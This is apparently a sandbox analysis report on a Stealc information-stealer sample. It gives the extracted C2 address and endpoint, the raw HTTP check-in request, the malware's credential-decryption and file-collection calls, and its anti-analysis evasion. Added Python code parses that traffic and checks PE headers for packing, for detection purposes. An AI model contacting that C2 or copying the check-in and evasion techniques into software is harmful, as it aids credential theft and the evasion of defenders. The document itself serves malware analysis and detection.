Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1543870
MD5: 15716110ba606bed84e305d1d8525eba
SHA1: a51087861dc45958cd52acec71d7255c36398aa1
SHA256: 14e0eab38beddaf7adc2997b84bd7777d2ccb898de7f9ce5afe1c0e6008c87f1
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • file.exe (PID: 1716, cmdline: "C:\Users\user\Desktop\file.exe", MD5: 15716110BA606BED84E305D1D8525EBA)
  • cleanup
Threat name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Extracted malware configuration: {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara matches (source | rule | description | author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000003.2073513483.0000000005530000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2114601767.000000000171E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 1716 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 1716 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.e60000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Sigma: no Sigma rule has matched.

Suricata alert (timestamp | SID | severity | classtype | source | destination | protocol):
2024-10-28T15:28:01.711498+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5:49704 | 185.215.113.206:80 | TCP

                AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.e60000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: Submitted sample | Integrated Neural Analysis Model: matched with 100.0% probability
Source: file.exe | Joe Sandbox ML: detected

Cryptographic API use ("Uses Microsoft's Enhanced Cryptographic Provider" in the signature list). CryptUnprotectData is the DPAPI call that decrypts data protected under the logged-on user's credentials, which is exactly what a stealer running inside the victim's session needs to read saved browser passwords and cookies; CryptStringToBinaryA/CryptBinaryToStringA are the decode/encode helpers (typically base64) around it:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E79030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E672A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E6A2B0 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E6A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E6C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat

Static and debug information:
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: my_library.pdbU | source: file.exe, 00000000.00000003.2073513483.000000000555B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: my_library.pdb | source: file.exe, file.exe, 00000000.00000003.2073513483.000000000555B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp

Directory enumeration (FindFirstFileA/FindNextFileA loops). Several of these functions also CopyFileA and DeleteFileA what they find, which fits the file-by-file collection and exfiltration the Malpedia description mentions (an interpretation, not a report finding):
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E740F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E6E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E747C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E6F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E61710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E6DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E74B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E73B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E6BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E6EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E6DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/6c4adf523b719729.php
Source: global traffic | HTTP traffic detected (first contact, a bare GET to the C2 root):
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected (the check-in the Suricata rule fired on; the multipart body carries only a hardware id and the build name "tale", which is the "Botnet" value in the extracted configuration):
    POST /6c4adf523b719729.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BGCAFHCAKFBFIECAFIIJ
    Host: 185.215.113.206
    Content-Length: 210
    Connection: Keep-Alive
    Cache-Control: no-cache

    ------BGCAFHCAKFBFIECAFIIJ
    Content-Disposition: form-data; name="hwid"

    5F7CB45FC7C4253817676
    ------BGCAFHCAKFBFIECAFIIJ
    Content-Disposition: form-data; name="build"

    tale
    ------BGCAFHCAKFBFIECAFIIJ--
Neither request carries a User-Agent header ("HTTP GET or POST without a user agent" in the signature list), consistent with InternetOpenA being called with an empty agent string. Together with the IP-literal Host header and the fixed hwid/build form fields, that is enough to write a network detection for this build.
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (seven connections; the C2 is configured as an IP literal, so there is no DNS lookup to alert on and blocking has to happen at the IP or HTTP layer)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E662D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle (the WinINet client behind both requests)
Source: file.exe, 00000000.00000002.2114601767.000000000171E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2114601767.0000000001780000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2114601767.000000000171E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2114601767.0000000001780000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2114601767.000000000171E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.2114601767.0000000001780000.00000004.00000020.00020000.00000000.sdmp | Strings found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/, http://185.215.113.206/6c4adf523b719729.php;, http://185.215.113.206/6c4adf523b719729.phpC, http://185.215.113.206/6c4adf523b719729.phps, http://185.215.113.206/: (the trailing characters are adjacent memory, not part of the URL)
Source: file.exe, file.exe, 00000000.00000003.2073513483.000000000555B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support (not a C2 indicator: this URL is part of an error message compiled into the Rust getrandom crate, and its presence in the same dumps as my_library.pdb points to a Rust-built component in the packed layer, which the report itself does not conclude)
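The check-in above, parsed and scored offline, as an added Python example (not code from Joe Sandbox, SEKOIA or the Stealc operator). The request bytes are rebuilt from the ASCII dump, the benign contrast request is constructed for comparison, and the four indicators and the threshold are this example's own heuristics, not the logic of Suricata rule 2044243, whose body the report does not show:

```python
"""Parse and score the Stealc check-in POST shown in this report.
Added example: not Joe Sandbox's, SEKOIA's or Stealc's code. The request is
rebuilt from the report's ASCII dump; the scoring heuristics are this example's
own, not the Suricata rule (2044243) that fired. Python 3.9+."""
import re

BOUNDARY = "----BGCAFHCAKFBFIECAFIIJ"


def multipart(boundary: str, fields: dict) -> bytes:
    """Encode fields the way the sample does: one form-data part per field, CRLF framed."""
    parts = [f'--{boundary}\r\nContent-Disposition: form-data; name="{k}"\r\n\r\n{v}\r\n'
             for k, v in fields.items()]
    return ("".join(parts) + f"--{boundary}--\r\n").encode("latin-1")


def http_post(path: str, headers: dict, body: bytes) -> bytes:
    head = f"POST {path} HTTP/1.1\r\n" + "".join(f"{k}: {v}\r\n" for k, v in headers.items())
    return (head + f"Content-Length: {len(body)}\r\n\r\n").encode("latin-1") + body


# Rebuilt from the report: hwid + build parts, no User-Agent, 210-byte body.
CHECKIN_BODY = multipart(BOUNDARY, {"hwid": "5F7CB45FC7C4253817676", "build": "tale"})
CHECKIN_REQUEST = http_post("/6c4adf523b719729.php", {
    "Content-Type": f"multipart/form-data; boundary={BOUNDARY}", "Host": "185.215.113.206",
    "Connection": "Keep-Alive", "Cache-Control": "no-cache"}, CHECKIN_BODY)
# Constructed benign contrast: a browser upload with a User-Agent and ordinary fields.
BENIGN_REQUEST = http_post("/api/avatar", {
    "Host": "app.example", "User-Agent": "Mozilla/5.0",
    "Content-Type": "multipart/form-data; boundary=abc123"},
    multipart("abc123", {"csrf": "q1w2e3", "title": "profile photo", "file": "PNG..."}))


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    method, path, _ = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        k, _, v = line.partition(":")
        headers[k.strip().lower()] = v.strip()
    return method, path, headers, body


def parse_multipart(body: bytes, content_type: str) -> dict:
    """Minimal multipart/form-data parser: name -> value for each part up to the closing delimiter."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("no multipart boundary in Content-Type")
    fields = {}
    for part in body.split(b"--" + m.group(1).encode("latin-1"))[1:]:
        if part.startswith(b"--"):          # "--boundary--" closes the body
            break
        head, _, value = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        name = re.search(r'name="([^"]*)"', head.decode("latin-1"))
        if name:
            fields[name.group(1)] = value.removesuffix(b"\r\n").decode("latin-1")
    return fields


def score_checkin(raw: bytes) -> dict:
    """Four cheap indicators of the observed check-in; three or more is a hit (example's own threshold)."""
    method, path, headers, body = parse_request(raw)
    ctype = headers.get("content-type", "")
    fields = parse_multipart(body, ctype) if ctype.startswith("multipart/form-data") else {}
    indicators = {
        "post_to_php": method == "POST" and path.lower().endswith(".php"),
        "no_user_agent": "user-agent" not in headers,
        "ip_literal_host": re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}(:\d+)?", headers.get("host", "")) is not None,
        "hwid_and_build_only": set(fields) == {"hwid", "build"},
    }
    score = sum(indicators.values())
    return {"fields": fields, "indicators": indicators, "score": score,
            "verdict": "stealc-like check-in" if score >= 3 else "no match"}


if __name__ == "__main__":
    print(score_checkin(CHECKIN_REQUEST))
    print(score_checkin(BENIGN_REQUEST))
```

The rebuilt body is exactly 210 bytes, matching the Content-Length the sandbox recorded, which is a useful sanity check that the CRLF framing above is right. The indicators are deliberately cheap so they can be lifted into a proxy log query or an IDS rule; the hwid/build field set is the most specific of the four and the missing User-Agent the least.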

                System Summary

Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)

Code functions listed without an API chain (most likely the overview's "Detected potential crypto function" signature, whose entries are reported this way). Addresses in the 0x00E6xxxx to 0x00EExxxx range fall inside the unpacked image that the Stealc Yara rule matched (0.2.file.exe.e60000.0.unpack), while those at 0x011xxxxx and above sit in the regions where the RDTSC and push/mov obfuscation entries below are found, most likely the packer layer:
Source: C:\Users\user\Desktop\file.exe | Code functions: 0_2_00EA0098, 0_2_00EBB198, 0_2_012BC052, 0_2_00E92138, 0_2_012B530E, 0_2_00EA4288, 0_2_00ECE258, 0_2_011863C7, 0_2_012AF249, 0_2_00EDD39E, 0_2_00EEB308, 0_2_012BF503, 0_2_01329592, 0_2_00EA45A8, 0_2_00ECD5A8, 0_2_00E84573, 0_2_00E8E544, 0_2_00EE96FD, 0_2_00EA66C8, 0_2_00EDA648, 0_2_00ED6799, 0_2_00EBD720, 0_2_00ECF8D6, 0_2_00EBB8A8, 0_2_00EB98B8, 0_2_00EB4868, 0_2_012B8995, 0_2_012AB860, 0_2_012A988A, 0_2_00EC8BD9, 0_2_00ED4BA8, 0_2_00ED0B88, 0_2_00EDAC28, 0_2_01373DEF, 0_2_01219DD7, 0_2_00EB4DC8, 0_2_00EB5DB9, 0_2_00EBBD68, 0_2_00E91D78, 0_2_00ECAD38, 0_2_00ED1EE8, 0_2_012C0F06, 0_2_00EA8E78, 0_2_012B6E28, 0_2_012ACE79, 0_2_012B1EBE

Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00E64610 appears 316 times ("Found potential string decryption / allocating functions": one helper called from 316 sites is the usual shape of a per-use string decryptor, and a good first hook point when extracting the stealer's configuration and target lists)
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: kkezmvxm ZLIB complexity 0.9947383536312014 (a value this close to 1 means the section barely compresses, i.e. it is already compressed or encrypted)
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E79790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle (process enumeration with a name comparison; "Searches for specific processes (likely to inject)")
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E73970 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\MRGRRNGO.htm (a WinINet cache entry, most likely the reply to the GET / above; it is a disk artefact of the C2 contact that outlives the process)
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | DLLs loaded (reported as "Section loaded"): apphelp.dll, winmm.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll (rstrtmgr.dll is the Restart Manager API, which reports the processes holding a given file open)
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 2151424 > 1048576
Source: file.exe | Static PE information: Raw size of kkezmvxm is bigger than: 0x100000 < 0x1a2400 (0x1a2400 is 1,713,152 bytes, about 80% of the 2,151,424-byte file: the packed payload is most of the binary)

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.e60000.0.unpack
    in memory: (empty):EW; .rsrc:W; .idata:W; (empty):EW; kkezmvxm:EW; fehabrus:EW; .taggant:EW
    on disk:   (empty):ER; .rsrc:W; .idata:W; (empty):EW; kkezmvxm:EW; fehabrus:EW; .taggant:EW
    The only difference is the first, unnamed section: execute+read on disk, execute+write once running. The packer makes the original code section writable and unpacks the stealer into it in place ("Detected unpacking (changes PE section rights)"); the Yara hit on the dump at 0x00E61000, the first section of the 0x00E60000 image, is that unpacked code.
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E79BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress (the stealer's import resolver: libraries and export names are resolved at run time, so the static import table says little about capability)
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x210600 should be: 0x21644b (the stored CheckSum does not match the file contents; Windows only enforces the field for drivers and some system binaries, so this is not a loader error, but it does mean the file was modified after the linker wrote the header)
Source: file.exe | Static PE information: section names: (empty), .rsrc, .idata, (empty), kkezmvxm, fehabrus, .taggant (two unnamed sections and two random-looking names; ".taggant" is associated with the IEEE software taggant that some commercial packers append)
Source: C:\Users\user\Desktop\file.exe | Code obfuscation ("Uses code obfuscation techniques (call, push, ret)"). "push X; mov dword ptr [esp], Y" is a plain push of Y hidden behind a throwaway push of X, and "push eax; retf" is an indirect jump dressed as a far return; both break linear disassembly and byte-pattern signatures on the packer stub. Function, instruction pair, and the address where the pair ends:
    0_2_013A2131: push 39306C14h; mov dword ptr [esp], edi (013A217A)
    0_2_00E8A0F2: push eax; retf (00E8A119)
    0_2_01592172: push ecx; mov dword ptr [esp], esi (01592186); push 4EBBBBB8h; mov dword ptr [esp], ecx (01592196); push edx; mov dword ptr [esp], 6497968Bh (015921A4); push ebp; mov dword ptr [esp], 5FF0712Fh (015921C8)
    0_2_00E8A0DC: push eax; retf (00E8A0F1)
    0_2_01369177: push 400D7F64h; mov dword ptr [esp], edx (01369194)
    0_2_0135B1F3: push 42D088A1h; mov dword ptr [esp], edi (0135B20A)
    0_2_0133C1F9: push ebp; mov dword ptr [esp], ebx (0133C275)
    0_2_0114D1CB: push 79CD2071h; mov dword ptr [esp], ebp (0114D1F4)
    0_2_012CB1C4: push ebp; mov dword ptr [esp], ebx (012CB1E8)
    0_2_01337031: push edi; mov dword ptr [esp], edx (013371C4)
    0_2_01592007: push esi; mov dword ptr [esp], edx (01592050); push edi; mov dword ptr [esp], edx (015920C6); push edi; mov dword ptr [esp], ebp (0159210C); push edi; mov dword ptr [esp], 3C6DE9A2h (0159211A)
    0_2_0159203F: push esi; mov dword ptr [esp], edx (01592050); push edi; mov dword ptr [esp], edx (015920C6); push edi; mov dword ptr [esp], ebp (0159210C); push edi; mov dword ptr [esp], 3C6DE9A2h (0159211A)
    0_2_012BC052: push 0E3A3DEEh; mov dword ptr [esp], esp (012BC05C); push 182D2F44h; mov dword ptr [esp], esi (012BC0B4); push edx; mov dword ptr [esp], ecx (012BC105); push ecx; mov dword ptr [esp], eax (012BC1CD); push 0123CBD3h; mov dword ptr [esp], ebx (012BC20F); push ecx; mov dword ptr [esp], eax (012BC246); push 10AEA30Bh; mov dword ptr [esp], edx (012BC268); push 58942800h; mov dword ptr [esp], ecx (012BC273); push 66713CCDh; mov dword ptr [esp], ebx (012BC2C0); push edi; mov dword ptr [esp], eax (012BC2F0)
Source: file.exe | Static PE information: section name: kkezmvxm entropy: 7.953994841848818 (8.0 bits per byte is the maximum; anything above roughly 7.0 is compressed or encrypted data, not code)
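The static findings in this section (unnamed and random-named sections, a high-entropy section, an entry point outside a standard section, a CheckSum that does not match the file) reduce to a handful of header checks. The following added Python example, not Joe Sandbox's code and not run on this sample (which is not available here), implements them with the standard library against a PE32 image it constructs itself. The section name kkezmvxm and the RWX flags are borrowed from the report so that the constructed "packed" case looks like this sample; the pseudo-random section contents, the 7.0-bit entropy threshold and the list of "standard" section names are the example's own choices, and the report's ZLIB complexity metric is not reproduced.

```python
"""Static PE triage for the packer indicators in this report: non-standard section
names, section entropy, entry point outside a standard section, invalid CheckSum.
Added example, not Joe Sandbox's or Stealc's code; standard library only (3.9+), run
offline against the PE32 image that build_sample_pe() constructs."""
import math
import random
import struct
from collections import Counter

STANDARD_SECTIONS = {".text", ".data", ".rdata", ".bss", ".idata", ".edata",
                     ".rsrc", ".reloc", ".tls", ".pdata", ".CRT"}   # example's own list


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly distributed bytes."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def pe_offset(data: bytes) -> int:
    off = struct.unpack_from("<I", data, 0x3C)[0] if data[:2] == b"MZ" else -1   # e_lfanew
    if off < 0 or data[off:off + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    return off


def pe_checksum(data: bytes) -> int:
    """CheckSum as CheckSumMappedFile computes it: 32-bit sum with carry folding that skips
    the CheckSum field (0x40 into the optional header), folded to 16 bits, plus file length."""
    skip, total = (pe_offset(data) + 24 + 0x40) // 4, 0
    padded = data + b"\0" * (-len(data) % 4)
    for i in range(len(padded) // 4):
        if i != skip:
            total += struct.unpack_from("<I", padded, i * 4)[0]
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    return ((total + (total >> 16)) & 0xFFFF) + len(data)


def parse_sections(data: bytes) -> list:
    """Section table entries plus the entropy of each section's raw bytes."""
    pe = pe_offset(data)
    nsec, opt_size = struct.unpack_from("<H", data, pe + 6)[0], struct.unpack_from("<H", data, pe + 20)[0]
    out = []
    for i in range(nsec):
        name, vsize, va, rsize, raw, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, pe + 24 + opt_size + 40 * i)
        out.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va, "vsize": vsize,
                    "chars": chars, "entropy": shannon_entropy(data[raw:raw + rsize])})
    return out


def entry_point_section(data: bytes, sections: list):
    ep = struct.unpack_from("<I", data, pe_offset(data) + 24 + 16)[0]   # AddressOfEntryPoint
    return next((s["name"] for s in sections if s["va"] <= ep < s["va"] + s["vsize"]), None)


def triage(data: bytes) -> dict:
    """The checks behind the section-name, entropy, entry-point and checksum findings above.
    A stored CheckSum of 0 is a linker default, not a mismatch."""
    secs = parse_sections(data)
    ep_sec = entry_point_section(data, secs)
    stored = struct.unpack_from("<I", data, pe_offset(data) + 24 + 0x40)[0]
    return {
        "nonstandard_sections": [s["name"] for s in secs if s["name"] not in STANDARD_SECTIONS],
        "high_entropy_sections": [s["name"] for s in secs if s["entropy"] > 7.0],
        "writable_code_sections": [s["name"] for s in secs   # IMAGE_SCN_MEM_EXECUTE and _WRITE
                                   if s["chars"] & 0x20000000 and s["chars"] & 0x80000000],
        "entry_point_section": ep_sec,
        "entry_outside_standard": ep_sec not in STANDARD_SECTIONS,
        "checksum_mismatch": stored != 0 and stored != pe_checksum(data),
    }


def build_sample_pe(packed: bool) -> bytes:
    """Constructed PE32 image (test data, not a real binary): a low-entropy .text section and,
    when packed, an RWX section with a random-looking name and pseudo-random contents that holds
    the entry point, mirroring kkezmvxm/.taggant in the report."""
    text = (b"\x55\x8b\xec\x5d\xc3" * 40).ljust(0x200, b"\xcc")
    sections = [(b".text", 0x1000, text, 0x60000020)]                          # CODE|EXECUTE|READ
    if packed:
        sections.append((b"kkezmvxm", 0x2000, random.Random(7).randbytes(0x800), 0xE0000020))
    dos = bytearray(64)
    dos[:2], dos[0x3C:0x40] = b"MZ", struct.pack("<I", 64)                     # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                                      # PE32 magic
    struct.pack_into("<I", opt, 16, sections[-1][1])                           # AddressOfEntryPoint
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, 0x200)                 # ImageBase, alignments
    table, body = b"", b""
    for name, va, content, chars in sections:
        table += struct.pack("<8sIIIIIIHHI", name, len(content), va, len(content),
                             0x400 + len(body), 0, 0, 0, 0, chars)
        body += content
    image = bytearray((bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table).ljust(0x400, b"\0") + body)
    struct.pack_into("<I", image, 64 + 24 + 0x40, pe_checksum(bytes(image)))   # stamp a valid CheckSum
    return bytes(image)


def tamper(data: bytes) -> bytes:
    """Flip the last byte, as a post-link patch would; the stored CheckSum no longer matches."""
    return data[:-1] + bytes([data[-1] ^ 0xFF])


PLAIN, PACKED = build_sample_pe(packed=False), build_sample_pe(packed=True)

if __name__ == "__main__":
    print(triage(PLAIN), triage(PACKED), triage(tamper(PACKED)), sep="\n")
```

To run it against a real file, read the bytes and call triage() on them. The checksum routine is the one pefile and Windows agree on, so the "real checksum: X should be: Y" line of a report can be reproduced with it; an entry point inside a section that is both writable and non-standard, as in the packed case here, is the combination worth alerting on, since a clean linker output has neither property.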

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
